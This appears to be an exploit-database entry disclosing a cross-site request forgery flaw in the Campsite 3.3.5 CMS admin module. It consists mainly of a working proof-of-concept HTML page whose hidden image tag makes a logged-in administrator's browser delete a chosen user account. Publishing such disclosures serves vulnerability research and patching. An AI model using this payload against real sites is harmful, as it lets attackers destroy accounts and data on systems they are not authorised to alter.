Campsite 3.3.5 - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-09 
date_updated:  
verified: 1 
codes: OSVDB-62851 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcampsite-3.3.5.tar.gz

                     =======================================================================

                                         campsite 3.3.5 CSRF Vulnerability

                     =======================================================================

                                                     by

                                                Pratul Agrawal



  # Vulnerability found in- Admin module

  # email         Pratulag@yahoo.com

  # company       aksitservices

  # Credit by     Pratul Agrawal

  # Category  	  CMS / Portals

  # Site p4ge     http://wwwcampware.org/

  # Plateform     php



  #  Proof of concept   #

  Targeted URL:  http://server/admin/login.php


  Script to delete the Admin user through Cross Site request forgery

             .  ..................................................................................................................

                        <html>

                          <body>

                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />

                          </body>

                        </html>


             .  ..................................................................................................................



  After execution refresh the page and u can see that user having giving ID  get deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact me.